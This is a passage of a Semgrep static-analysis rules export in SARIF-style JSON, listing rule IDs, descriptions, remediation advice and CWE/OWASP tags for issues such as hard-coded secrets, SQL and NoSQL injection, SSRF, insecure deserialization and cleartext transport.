SFTP."},"help":{"markdown":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open](https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open)\n","text":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","id":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","name":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","id":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","name":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"help":{"markdown":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","id":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","name":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false","id":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","name":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-cookie-http-false.taint-cookie-http-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","id":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","name":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Stripe API Key detected"},"help":{"markdown":"Stripe API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Stripe API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","id":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","name":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"help":{"markdown":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST').\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping)\n - [https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING](https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING)\n","text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"helpUri":"https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","id":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","name":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"help":{"markdown":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod","id":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","name":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostpid-pod.hostpid-pod"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","id":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","name":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `vm2`."},"help":{"markdown":"Make sure that unverified user data can not reach `vm2`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html)\n","text":"Make sure that unverified user data can not reach `vm2`."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection","id":"javascript.express.security.express-vm2-injection.express-vm2-injection","name":"javascript.express.security.express-vm2-injection.express-vm2-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-vm2-injection.express-vm2-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","id":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","name":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"help":{"markdown":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli)\n - [https://www.rubydoc.info/gems/pg/PG/Connection](https://www.rubydoc.info/gems/pg/PG/Connection)\n","text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","id":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","name":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","id":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","name":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"help":{"markdown":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","id":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","name":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"help":{"markdown":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A expression is built with a dynamic value. The source of the value(s) should be verified to avoid that unfiltered values fall into this risky code evaluation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","id":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","name":"java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.dangerous-groovy-shell.dangerous-groovy-shell"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","id":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","name":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.jpa-sqli.jpa-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-dill.tainted-dill","id":"python.lang.deserialization.tainted-dill.tainted-dill","name":"python.lang.deserialization.tainted-dill.tainted-dill","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-dill.tainted-dill"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to 